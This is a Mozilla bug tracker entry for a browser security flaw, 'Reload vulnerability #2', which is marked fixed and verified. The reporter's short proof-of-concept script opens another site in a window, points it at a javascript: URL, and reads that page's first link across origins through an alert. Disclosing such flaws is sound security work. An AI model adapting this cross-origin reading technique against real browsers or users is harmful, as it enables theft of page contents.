Closed
Bug 25206
Opened 25 years ago
Closed 25 years ago
Reload vulnerability #2
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+] Expected resolution date: 2/11)
Reloading a page which location is set to a "javascript:" URL may reveal the DOM of the page. The code is: --------------------------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","victim"); function f() { a.location="javascript:try {alert('Here is the first link: '+document.links[0].href)} catch(ex) {alert('Reload the Yahoo window')}"; } setTimeout("f()",8000); </SCRIPT> ---------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Assignee | ||
Updated•25 years ago
|
Group: netscapeconfidential?
Assignee | ||
Updated•25 years ago
|
Whiteboard: [PDT+] → [PDT+] Expected resolution date: 2/11
Assignee | ||
Comment 2•25 years ago
|
||
Checked in fix
Group: netscapeconfidential?
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Updated•19 years ago
|
Flags: testcase+
Updated•17 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•